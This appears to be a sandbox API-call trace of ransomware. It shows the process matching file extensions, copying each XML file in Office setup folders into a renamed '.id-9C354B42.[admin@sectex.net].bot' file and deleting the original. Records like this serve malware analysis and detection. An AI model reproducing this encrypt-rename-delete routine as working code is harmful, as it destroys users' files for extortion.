	[0036.792] GetFileSizeEx (in: hFile=0x1b4, lpFileSize=0xa19ff1c | out: lpFileSize=0xa19ff1c*=2764) returned 1
	[0036.792] CloseHandle (hObject=0x1b4) returned 1
	[0036.800] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\symbols\\symbase.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\symbols\\symbase.xml")) returned 0x20
	[0036.813] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\symbols\\symbase.xml.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\symbols\\symbase.xml.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0036.814] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\symbols\\symbase.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\symbols\\symbase.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff
	[0036.814] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\symbols\\symbase.xml") returned 84
	[0036.814] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\symbols\\symbase.xml") returned 84
	[0036.814] lstrlenW (lpString=".doc") returned 4
	[0036.814] lstrcmpiW (lpString1=".doc", lpString2=".xml") returned -1
	[0036.814] lstrlenW (lpString=".docx") returned 5
	[0036.814] lstrcmpiW (lpString1=".docx", lpString2="e.xml") returned -1
	[0036.814] lstrlenW (lpString=".pdf") returned 4
	[0036.814] lstrcmpiW (lpString1=".pdf", lpString2=".xml") returned -1
	[0036.814] lstrlenW (lpString=".xls") returned 4
	[0036.814] lstrcmpiW (lpString1=".xls", lpString2=".xml") returned -1
	[0036.814] lstrlenW (lpString=".xlsx") returned 5
	[0036.814] lstrcmpiW (lpString1=".xlsx", lpString2="e.xml") returned -1
	[0036.814] lstrlenW (lpString=".ppt") returned 4
	[0036.814] lstrcmpiW (lpString1=".ppt", lpString2=".xml") returned -1
	[0036.814] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\symbols\\symbase.xml") returned 84
	[0036.814] lstrlenW (lpString=".zip") returned 4
	[0036.814] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1
	[0036.814] lstrlenW (lpString=".rar") returned 4
	[0036.814] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1
	[0036.814] lstrlenW (lpString=".bz2") returned 4
	[0036.814] lstrcmpiW (lpString1=".bz2", lpString2=".xml") returned -1
	[0036.814] lstrlenW (lpString=".7z") returned 3
	[0036.814] lstrcmpiW (lpString1=".7z", lpString2="xml") returned -1
	[0036.814] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\symbols\\symbase.xml") returned 84
	[0036.814] lstrlenW (lpString=".dbf") returned 4
	[0036.814] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1
	[0036.814] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\symbols\\symbase.xml") returned 84
	[0036.814] lstrlenW (lpString=".1cd") returned 4
	[0036.814] lstrcmpiW (lpString1=".1cd", lpString2=".xml") returned -1
	[0036.814] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\symbols\\symbase.xml") returned 84
	[0036.814] lstrlenW (lpString=".jpg") returned 4
	[0036.814] lstrcmpiW (lpString1=".jpg", lpString2=".xml") returned -1
	[0036.815] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\symbols\\symbase.xml") returned 84
	[0036.815] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\symbols\\symbase.xml") returned 84
	[0036.815] lstrlenW (lpString=".doc") returned 4
	[0036.815] lstrcmpiW (lpString1=".doc", lpString2=".xml") returned -1
	[0036.815] lstrlenW (lpString=".docx") returned 5
	[0036.815] lstrcmpiW (lpString1=".docx", lpString2="e.xml") returned -1
	[0036.815] lstrlenW (lpString=".pdf") returned 4
	[0036.815] lstrcmpiW (lpString1=".pdf", lpString2=".xml") returned -1
	[0036.815] lstrlenW (lpString=".xls") returned 4
	[0036.815] lstrcmpiW (lpString1=".xls", lpString2=".xml") returned -1
	[0036.815] lstrlenW (lpString=".xlsx") returned 5
	[0036.815] lstrcmpiW (lpString1=".xlsx", lpString2="e.xml") returned -1
	[0036.815] lstrlenW (lpString=".ppt") returned 4
	[0036.815] lstrcmpiW (lpString1=".ppt", lpString2=".xml") returned -1
	[0036.815] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\symbols\\symbase.xml") returned 84
	[0036.815] lstrlenW (lpString=".zip") returned 4
	[0036.815] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1
	[0036.815] lstrlenW (lpString=".rar") returned 4
	[0036.815] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1
	[0036.815] lstrlenW (lpString=".bz2") returned 4
	[0036.815] lstrcmpiW (lpString1=".bz2", lpString2=".xml") returned -1
	[0036.815] lstrlenW (lpString=".7z") returned 3
	[0036.815] lstrcmpiW (lpString1=".7z", lpString2="xml") returned -1
	[0036.815] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\symbols\\symbase.xml") returned 84
	[0036.815] lstrlenW (lpString=".dbf") returned 4
	[0036.815] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1
	[0036.815] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\symbols\\symbase.xml") returned 84
	[0036.815] lstrlenW (lpString=".1cd") returned 4
	[0036.815] lstrcmpiW (lpString1=".1cd", lpString2=".xml") returned -1
	[0036.815] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\symbols\\symbase.xml") returned 84
	[0036.815] lstrlenW (lpString=".jpg") returned 4
	[0036.815] lstrcmpiW (lpString1=".jpg", lpString2=".xml") returned -1
	[0036.816] lstrcmpiW (lpString1=".XML", lpString2=".bot") returned 1
	[0036.816] lstrlenW (lpString="GrooveMUI.XML") returned 13
	[0036.816] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Groove.en-us\\GrooveMUI.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\groove.en-us\\groovemui.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1a0
	[0036.816] GetFileSizeEx (in: hFile=0x1a0, lpFileSize=0xa19ff1c | out: lpFileSize=0xa19ff1c*=913) returned 1
	[0036.816] CloseHandle (hObject=0x1a0) returned 1
	[0036.816] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Groove.en-us\\GrooveMUI.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\groove.en-us\\groovemui.xml")) returned 0x20
	[0036.816] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Groove.en-us\\GrooveMUI.XML.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\groove.en-us\\groovemui.xml.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0036.816] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Groove.en-us\\GrooveMUI.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\groove.en-us\\groovemui.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1a0
	[0036.816] SetFilePointerEx (in: hFile=0x1a0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa19fec8 | out: lpNewFilePointer=0x0) returned 1
	[0036.816] SetFilePointerEx (in: hFile=0x1a0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa19fec8 | out: lpNewFilePointer=0x0) returned 1
	[0036.816] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Groove.en-us\\GrooveMUI.XML.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\groove.en-us\\groovemui.xml.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1b0
	[0036.856] GetLastError () returned 0x0
	[0036.856] ReadFile (in: hFile=0x1a0, lpBuffer=0xad80020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa19fed4, lpOverlapped=0x0 | out: lpBuffer=0xad80020*, lpNumberOfBytesRead=0xa19fed4*=0x391, lpOverlapped=0x0) returned 1
	[0036.860] WriteFile (in: hFile=0x1b0, lpBuffer=0xad80020*, nNumberOfBytesToWrite=0x3a0, lpNumberOfBytesWritten=0xa19fc9c, lpOverlapped=0x0 | out: lpBuffer=0xad80020*, lpNumberOfBytesWritten=0xa19fc9c*=0x3a0, lpOverlapped=0x0) returned 1
	[0036.861] ReadFile (in: hFile=0x1a0, lpBuffer=0xad80020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa19fed4, lpOverlapped=0x0 | out: lpBuffer=0xad80020*, lpNumberOfBytesRead=0xa19fed4*=0x0, lpOverlapped=0x0) returned 1
	[0036.861] WriteFile (in: hFile=0x1b0, lpBuffer=0xad80020*, nNumberOfBytesToWrite=0xee, lpNumberOfBytesWritten=0xa19fc9c, lpOverlapped=0x0 | out: lpBuffer=0xad80020*, lpNumberOfBytesWritten=0xa19fc9c*=0xee, lpOverlapped=0x0) returned 1
	[0036.861] SetEndOfFile (hFile=0x1b0) returned 1
	[0036.864] CloseHandle (hObject=0x1b0) returned 1
	[0036.864] SetFilePointerEx (in: hFile=0x1a0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa19fec8 | out: lpNewFilePointer=0x0) returned 1
	[0036.864] SetEndOfFile (hFile=0x1a0) returned 1
	[0036.865] CloseHandle (hObject=0x1a0) returned 1
	[0036.865] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Groove.en-us\\GrooveMUI.XML.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x20) returned 1
	[0036.866] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Groove.en-us\\GrooveMUI.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\groove.en-us\\groovemui.xml")) returned 1
	[0036.866] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Groove.en-us\\GrooveMUI.XML") returned 106
	[0036.866] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Groove.en-us\\GrooveMUI.XML") returned 106
	[0036.866] lstrlenW (lpString=".doc") returned 4
	[0036.866] lstrcmpiW (lpString1=".doc", lpString2=".XML") returned -1
	[0036.866] lstrlenW (lpString=".docx") returned 5
	[0036.866] lstrcmpiW (lpString1=".docx", lpString2="I.XML") returned -1
	[0036.866] lstrlenW (lpString=".pdf") returned 4
	[0036.866] lstrcmpiW (lpString1=".pdf", lpString2=".XML") returned -1
	[0036.866] lstrlenW (lpString=".xls") returned 4
	[0036.866] lstrcmpiW (lpString1=".xls", lpString2=".XML") returned -1
	[0036.866] lstrlenW (lpString=".xlsx") returned 5
	[0036.866] lstrcmpiW (lpString1=".xlsx", lpString2="I.XML") returned -1
	[0036.866] lstrlenW (lpString=".ppt") returned 4
	[0036.866] lstrcmpiW (lpString1=".ppt", lpString2=".XML") returned -1
	[0036.866] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Groove.en-us\\GrooveMUI.XML") returned 106
	[0036.866] lstrlenW (lpString=".zip") returned 4
	[0036.866] lstrcmpiW (lpString1=".zip", lpString2=".XML") returned 1
	[0036.866] lstrlenW (lpString=".rar") returned 4
	[0036.866] lstrcmpiW (lpString1=".rar", lpString2=".XML") returned -1
	[0036.866] lstrlenW (lpString=".bz2") returned 4
	[0036.866] lstrcmpiW (lpString1=".bz2", lpString2=".XML") returned -1
	[0036.866] lstrlenW (lpString=".7z") returned 3
	[0036.866] lstrcmpiW (lpString1=".7z", lpString2="XML") returned -1
	[0036.866] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Groove.en-us\\GrooveMUI.XML") returned 106
	[0036.866] lstrlenW (lpString=".dbf") returned 4
	[0036.866] lstrcmpiW (lpString1=".dbf", lpString2=".XML") returned -1
	[0036.867] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Groove.en-us\\GrooveMUI.XML") returned 106
	[0036.867] lstrlenW (lpString=".1cd") returned 4
	[0036.867] lstrcmpiW (lpString1=".1cd", lpString2=".XML") returned -1
	[0036.867] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Groove.en-us\\GrooveMUI.XML") returned 106
	[0036.867] lstrlenW (lpString=".jpg") returned 4
	[0036.867] lstrcmpiW (lpString1=".jpg", lpString2=".XML") returned -1
	[0036.867] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Groove.en-us\\GrooveMUI.XML") returned 106
	[0036.867] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Groove.en-us\\GrooveMUI.XML") returned 106
	[0036.867] lstrlenW (lpString=".doc") returned 4
	[0036.867] lstrcmpiW (lpString1=".doc", lpString2=".XML") returned -1
	[0036.867] lstrlenW (lpString=".docx") returned 5
	[0036.867] lstrcmpiW (lpString1=".docx", lpString2="I.XML") returned -1
	[0036.867] lstrlenW (lpString=".pdf") returned 4
	[0036.867] lstrcmpiW (lpString1=".pdf", lpString2=".XML") returned -1
	[0036.867] lstrlenW (lpString=".xls") returned 4
	[0036.867] lstrcmpiW (lpString1=".xls", lpString2=".XML") returned -1
	[0036.867] lstrlenW (lpString=".xlsx") returned 5
	[0036.867] lstrcmpiW (lpString1=".xlsx", lpString2="I.XML") returned -1
	[0036.867] lstrlenW (lpString=".ppt") returned 4
	[0036.867] lstrcmpiW (lpString1=".ppt", lpString2=".XML") returned -1
	[0036.867] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Groove.en-us\\GrooveMUI.XML") returned 106
	[0036.867] lstrlenW (lpString=".zip") returned 4
	[0036.867] lstrcmpiW (lpString1=".zip", lpString2=".XML") returned 1
	[0036.867] lstrlenW (lpString=".rar") returned 4
	[0036.867] lstrcmpiW (lpString1=".rar", lpString2=".XML") returned -1
	[0036.867] lstrlenW (lpString=".bz2") returned 4
	[0036.867] lstrcmpiW (lpString1=".bz2", lpString2=".XML") returned -1
	[0036.867] lstrlenW (lpString=".7z") returned 3
	[0036.867] lstrcmpiW (lpString1=".7z", lpString2="XML") returned -1
	[0036.867] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Groove.en-us\\GrooveMUI.XML") returned 106
	[0036.867] lstrlenW (lpString=".dbf") returned 4
	[0036.867] lstrcmpiW (lpString1=".dbf", lpString2=".XML") returned -1
	[0036.867] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Groove.en-us\\GrooveMUI.XML") returned 106
	[0036.867] lstrlenW (lpString=".1cd") returned 4
	[0036.868] lstrcmpiW (lpString1=".1cd", lpString2=".XML") returned -1
	[0036.868] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Groove.en-us\\GrooveMUI.XML") returned 106
	[0036.868] lstrlenW (lpString=".jpg") returned 4
	[0036.868] lstrcmpiW (lpString1=".jpg", lpString2=".XML") returned -1
	[0036.868] lstrcmpiW (lpString1=".XML", lpString2=".bot") returned 1
	[0036.868] lstrlenW (lpString="SETUP.XML") returned 9
	[0036.868] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Groove.en-us\\SETUP.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\groove.en-us\\setup.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1bc
	[0036.879] GetFileSizeEx (in: hFile=0x1bc, lpFileSize=0xa19ff1c | out: lpFileSize=0xa19ff1c*=1452) returned 1
	[0036.879] CloseHandle (hObject=0x1bc) returned 1
	[0036.879] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Groove.en-us\\SETUP.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\groove.en-us\\setup.xml")) returned 0x20
	[0036.879] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Groove.en-us\\SETUP.XML.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\groove.en-us\\setup.xml.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0036.879] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Groove.en-us\\SETUP.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\groove.en-us\\setup.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1bc
	[0036.879] SetFilePointerEx (in: hFile=0x1bc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa19fec8 | out: lpNewFilePointer=0x0) returned 1
	[0036.879] SetFilePointerEx (in: hFile=0x1bc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa19fec8 | out: lpNewFilePointer=0x0) returned 1
	[0036.879] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Groove.en-us\\SETUP.XML.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\groove.en-us\\setup.xml.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1a0
	[0036.880] GetLastError () returned 0x0
	[0036.880] ReadFile (in: hFile=0x1bc, lpBuffer=0xad80020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa19fed4, lpOverlapped=0x0 | out: lpBuffer=0xad80020*, lpNumberOfBytesRead=0xa19fed4*=0x5ac, lpOverlapped=0x0) returned 1
	[0036.884] WriteFile (in: hFile=0x1a0, lpBuffer=0xad80020*, nNumberOfBytesToWrite=0x5b0, lpNumberOfBytesWritten=0xa19fc9c, lpOverlapped=0x0 | out: lpBuffer=0xad80020*, lpNumberOfBytesWritten=0xa19fc9c*=0x5b0, lpOverlapped=0x0) returned 1
	[0036.885] ReadFile (in: hFile=0x1bc, lpBuffer=0xad80020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa19fed4, lpOverlapped=0x0 | out: lpBuffer=0xad80020*, lpNumberOfBytesRead=0xa19fed4*=0x0, lpOverlapped=0x0) returned 1
	[0036.885] WriteFile (in: hFile=0x1a0, lpBuffer=0xad80020*, nNumberOfBytesToWrite=0xe6, lpNumberOfBytesWritten=0xa19fc9c, lpOverlapped=0x0 | out: lpBuffer=0xad80020*, lpNumberOfBytesWritten=0xa19fc9c*=0xe6, lpOverlapped=0x0) returned 1
	[0036.885] SetEndOfFile (hFile=0x1a0) returned 1
	[0036.885] CloseHandle (hObject=0x1a0) returned 1
	[0036.887] SetFilePointerEx (in: hFile=0x1bc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa19fec8 | out: lpNewFilePointer=0x0) returned 1
	[0036.887] SetEndOfFile (hFile=0x1bc) returned 1
	[0036.888] CloseHandle (hObject=0x1bc) returned 1
	[0036.888] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Groove.en-us\\SETUP.XML.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x20) returned 1
	[0036.888] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Groove.en-us\\SETUP.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\groove.en-us\\setup.xml")) returned 1
	[0036.889] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Groove.en-us\\SETUP.XML") returned 102
	[0036.889] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Groove.en-us\\SETUP.XML") returned 102
	[0036.889] lstrlenW (lpString=".doc") returned 4
	[0036.889] lstrcmpiW (lpString1=".doc", lpString2=".XML") returned -1
	[0036.889] lstrlenW (lpString=".docx") returned 5
	[0036.889] lstrcmpiW (lpString1=".docx", lpString2="P.XML") returned -1
	[0036.889] lstrlenW (lpString=".pdf") returned 4
	[0036.889] lstrcmpiW (lpString1=".pdf", lpString2=".XML") returned -1
	[0036.889] lstrlenW (lpString=".xls") returned 4
	[0036.889] lstrcmpiW (lpString1=".xls", lpString2=".XML") returned -1
	[0036.889] lstrlenW (lpString=".xlsx") returned 5
	[0036.889] lstrcmpiW (lpString1=".xlsx", lpString2="P.XML") returned -1
	[0036.889] lstrlenW (lpString=".ppt") returned 4
	[0036.889] lstrcmpiW (lpString1=".ppt", lpString2=".XML") returned -1
	[0036.889] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Groove.en-us\\SETUP.XML") returned 102
	[0036.889] lstrlenW (lpString=".zip") returned 4
	[0036.889] lstrcmpiW (lpString1=".zip", lpString2=".XML") returned 1
	[0036.889] lstrlenW (lpString=".rar") returned 4
	[0036.889] lstrcmpiW (lpString1=".rar", lpString2=".XML") returned -1
	[0036.889] lstrlenW (lpString=".bz2") returned 4
	[0036.889] lstrcmpiW (lpString1=".bz2", lpString2=".XML") returned -1
	[0036.889] lstrlenW (lpString=".7z") returned 3
	[0036.889] lstrcmpiW (lpString1=".7z", lpString2="XML") returned -1
	[0036.889] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Groove.en-us\\SETUP.XML") returned 102
	[0036.889] lstrlenW (lpString=".dbf") returned 4
	[0036.889] lstrcmpiW (lpString1=".dbf", lpString2=".XML") returned -1
	[0036.889] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Groove.en-us\\SETUP.XML") returned 102
	[0036.889] lstrlenW (lpString=".1cd") returned 4
	[0036.889] lstrcmpiW (lpString1=".1cd", lpString2=".XML") returned -1
	[0036.889] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Groove.en-us\\SETUP.XML") returned 102
	[0036.890] lstrlenW (lpString=".jpg") returned 4
	[0036.890] lstrcmpiW (lpString1=".jpg", lpString2=".XML") returned -1
	[0036.890] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Groove.en-us\\SETUP.XML") returned 102
	[0036.890] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Groove.en-us\\SETUP.XML") returned 102
	[0036.890] lstrlenW (lpString=".doc") returned 4
	[0036.890] lstrcmpiW (lpString1=".doc", lpString2=".XML") returned -1
	[0036.890] lstrlenW (lpString=".docx") returned 5
	[0036.890] lstrcmpiW (lpString1=".docx", lpString2="P.XML") returned -1
	[0036.890] lstrlenW (lpString=".pdf") returned 4
	[0036.890] lstrcmpiW (lpString1=".pdf", lpString2=".XML") returned -1
	[0036.890] lstrlenW (lpString=".xls") returned 4
	[0036.890] lstrcmpiW (lpString1=".xls", lpString2=".XML") returned -1
	[0036.890] lstrlenW (lpString=".xlsx") returned 5
	[0036.890] lstrcmpiW (lpString1=".xlsx", lpString2="P.XML") returned -1
	[0036.890] lstrlenW (lpString=".ppt") returned 4
	[0036.890] lstrcmpiW (lpString1=".ppt", lpString2=".XML") returned -1
	[0036.890] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Groove.en-us\\SETUP.XML") returned 102
	[0036.890] lstrlenW (lpString=".zip") returned 4
	[0036.890] lstrcmpiW (lpString1=".zip", lpString2=".XML") returned 1
	[0036.890] lstrlenW (lpString=".rar") returned 4
	[0036.890] lstrcmpiW (lpString1=".rar", lpString2=".XML") returned -1
	[0036.890] lstrlenW (lpString=".bz2") returned 4
	[0036.890] lstrcmpiW (lpString1=".bz2", lpString2=".XML") returned -1
	[0036.890] lstrlenW (lpString=".7z") returned 3
	[0036.890] lstrcmpiW (lpString1=".7z", lpString2="XML") returned -1
	[0036.890] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Groove.en-us\\SETUP.XML") returned 102
	[0036.890] lstrlenW (lpString=".dbf") returned 4
	[0036.890] lstrcmpiW (lpString1=".dbf", lpString2=".XML") returned -1
	[0036.890] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Groove.en-us\\SETUP.XML") returned 102
	[0036.890] lstrlenW (lpString=".1cd") returned 4
	[0036.890] lstrcmpiW (lpString1=".1cd", lpString2=".XML") returned -1
	[0036.890] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Groove.en-us\\SETUP.XML") returned 102
	[0036.890] lstrlenW (lpString=".jpg") returned 4
	[0036.890] lstrcmpiW (lpString1=".jpg", lpString2=".XML") returned -1
	[0036.891] lstrcmpiW (lpString1=".XML", lpString2=".bot") returned 1
	[0036.891] lstrlenW (lpString="SETUP.XML") returned 9
	[0036.891] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\InfoPath.en-us\\SETUP.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\infopath.en-us\\setup.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1bc
	[0036.891] GetFileSizeEx (in: hFile=0x1bc, lpFileSize=0xa19ff1c | out: lpFileSize=0xa19ff1c*=1852) returned 1
	[0036.891] CloseHandle (hObject=0x1bc) returned 1
	[0036.891] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\InfoPath.en-us\\SETUP.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\infopath.en-us\\setup.xml")) returned 0x20
	[0036.891] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\InfoPath.en-us\\SETUP.XML.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\infopath.en-us\\setup.xml.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0036.891] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\InfoPath.en-us\\SETUP.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\infopath.en-us\\setup.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1bc
	[0036.891] SetFilePointerEx (in: hFile=0x1bc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa19fec8 | out: lpNewFilePointer=0x0) returned 1
